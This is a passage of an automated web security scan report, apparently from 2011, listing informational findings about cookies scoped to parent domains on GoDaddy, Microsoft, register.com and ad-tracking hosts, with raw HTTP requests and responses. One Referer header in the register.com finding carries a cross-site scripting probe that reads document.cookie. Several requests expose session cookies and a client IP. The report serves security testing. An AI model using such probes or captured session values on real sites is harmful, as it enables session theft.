Cookie: s_cid=38212; s_iid=38573; cms_site_lang=1; offer_version=a%3A1%3A%7Bi%3A1057%3Bi%3A187%3B%7D; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1313976253453-233900.19#1316119783|check#true#1314910243|session#1314910182276-94505#1314912043; elqCustomerGUID=19ddb6ae-1941-431a-9104-41006951b164; campaign_stack=%5B%5B'38212'%2C'1313976267286'%5D%5D; b1=Logged%3A%20Banner%20Group%3A%20Search+Engine+Land+-+300x250+-+ROS; b2=Logged%3A%20Banner%3A%20300x250+-+2629+CV2; _jsuid=7264741388645661943; s_osc=14885; s_lv=1314806934818; s_vnum=1317398913538%26vn%3D1; v1stsp=552ED6C388FBA32B

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Sat, 03 Sep 2011 18:43:32 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 04 Oct 2010 17:31:59 GMT
xserver: www5.dmz
Content-Length: 482
Content-Type: application/javascript
Date: Sat, 03 Sep 2011 14:43:32 GMT
Connection: close
Set-Cookie: omniture_unique=6bcc0a791fca22f3e882adf94660e88c; path=/; domain=omniture.com
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

mboxCreate('omniTargetingInfo',
'profile.geo_ip=50.23.123.106',
'profile.geo_zip=75207',
'profile.geo_gmt_offset=-500',
'profile.geo_country=usa',
'profile.geo_country_code=840',
'profile.geo_region=t
...[SNIP]...

10.54. http://segment-pixel.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=169&partnerUID=4e5e3f1ae3fd7427&sscs_active=1 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=e1c22076-53f3-4fd9-8356-2735bf06a66c; partnerUID="eyIxNjkiOiBbIjRlNWUzZjFhZTNmZDc0MjciLCB0cnVlXX0="; segments_p1="eJzjYuHY2M7IxcIx9wojAA9oAtg="; exchange_uid="eyI0IjogWyJDQUVTRVB4NVdCa2dwbTVNQ3pVRHd2TlVDNXciLCA3MzQzODNdfQ=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 03 Sep 2011 17:32:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 03-Sep-2011 17:32:02 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyIxNjkiOiBbIjRlNWUzZjFhZTNmZDc0MjciLCB0cnVlXX0="; Domain=invitemedia.com; expires=Sun, 02-Sep-2012 17:32:22 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.55. http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.expression.microsoft.com
Path:   /Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6 HTTP/1.1
Host: social.expression.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:15 GMT; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:15 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB19
Date: Sat, 03 Sep 2011 12:58:15 GMT
Content-Length: 60480


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...

10.56. http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.expression.microsoft.com
Path:   /Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0 HTTP/1.1
Host: social.expression.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: msdn=L=1030; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:16 GMT; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1030; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:16 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB22
Date: Sat, 03 Sep 2011 12:58:15 GMT
Content-Length: 28901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...

10.57. http://static.getclicky.com/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.getclicky.com
Path:   /js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js HTTP/1.1
Host: static.getclicky.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sat, 03 Sep 2011 13:15:11 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Last-Modified: Tue, 23 Aug 2011 01:10:54 GMT
Vary: Accept-Encoding
Expires: Sat, 10 Sep 2011 13:15:11 GMT
Cache-Control: max-age=604800
Set-Cookie: __cfduid=d1bed28fcd5cbef887c32392d5431dedf1315055711; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.getclicky.com
Set-Cookie: __cfduid=d1bed28fcd5cbef887c32392d5431dedf1315055711; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.static.getclicky.com
Content-Length: 9136

var clicky_obj=clicky_obj||(function(){var instance=null;function _ins(){var _self=this,site_ids=[],pageviews_fired=[],domain,secure,ref,ps_interval,ps_stop;this.init=function(site_id){site_ids.push(s
...[SNIP]...

10.58. http://www.godaddy.com/Payment/payment-options.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Payment/payment-options.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Payment/payment-options.aspx?ci=11266 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=4f057259-4645-4223-96aa-98d6262a1c68; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=; ASPSESSIONIDAATRCSST=DCJFEOKAIBECOFPMMBGNKPKK

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:07 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:07 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=11266%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=6; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:26:07 GMT
Content-Length: 103730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

10.59. http://www.godaddy.com/affiliates/affiliate-program.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /affiliates/affiliate-program.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /affiliates/affiliate-program.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:25:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/affiliates/affiliate-program.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:25:55 GMT
Content-Length: 98753


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><
...[SNIP]...

10.60. http://www.godaddy.com/gdshop/offers/cross_sell.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /gdshop/offers/cross_sell.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; expires=Sun, 02-Sep-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB109&sitename=www%2Egodaddy%2Ecom&cookies=1&split=24&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&referringdomain=&referringpath=8d587be0%2D834e%2D4a03%2D83dc%2D2f3bcb783a40&shopper=46215684&querystring=ci%3D42031%26config%3Dssldefault; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:45:24 GMT
Content-Length: 271865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Low cost domain names, domain transfers, web hosting, em
...[SNIP]...

10.61. http://www.godaddy.com/shared/video/videos.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /shared/video/videos.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/video/videos.aspx?ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/affiliates/affiliate-program.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; pathway=4f057259-4645-4223-96aa-98d6262a1c68; ASPSESSIONIDAATRCSST=DCJFEOKAIBECOFPMMBGNKPKK; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=oemhlbvbcgufsjahmchddfndphwizcii; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=24; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:26:17 GMT
Content-Length: 27411

popUpFill({"Html":"\r\n\r\n\u003cscript src=\"http://img3.wsimg.com/fos/script/sales_tabs12.min.js\" type=\"text/javascript\"\u003e\u003c/script\u003e\r\n \r\n\r\n \u003ctable id=\"video_trigger\" ce
...[SNIP]...

10.62. http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/JsonContent/GetMultiDomainsPlanList.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ssl/JsonContent/GetMultiDomainsPlanList.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Content-Length: 82
Origin: http://www.godaddy.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=ci=8346&shopper=&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=&referringdomain=&split=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

planType=standard&domainsIndex=0&targetDivID=smulti_ddl_container&ddlID=smulti_ddl

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:29:25 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:29:25 GMT
Content-Length: 820

{"Html":"\r\n \u003cselect id=\"smulti_ddl\" class=\"t11 plan_ddl\"\u003e\r\n \u003coption value=\u00275710\u0027 \u003e1 Yr: $89.99/yr \u003c/option\u003e\u003coption value=\u00275718\u0027 \u003
...[SNIP]...

10.63. http://www.godaddy.com/ssl/ssl-certificates.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/ssl-certificates.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssl/ssl-certificates.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault&sitename=cart.godaddy.com&page=/basket.aspx&server=M1PWCARTWEB009&status=200 OK&querystring=app_hdr=&piishown=0&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&split=24&referringdomain=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:52 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:52 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=46215917&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=19a7e39c-dcff-40f6-8f6d-e19d0c50259d&referringdomain=&split=69; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_ssl=rezcqjcaqgtalgqbijnijijbnhagqigb; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:48:51 GMT
Content-Length: 134936


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><
...[SNIP]...

10.64. http://www.register.com/css/basic.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /css/basic.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/basic.css HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:10 GMT
Set-Cookie: TLTSID=BDC26718D67410D617BB9E98795010A3; Path=/; Domain=.register.com
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:11 GMT
ETag: "48e6e-2a0dc-4aba016b636c0"
Accept-Ranges: bytes
P3P: policyref="http://www.register.com/websitepolicy.xml"
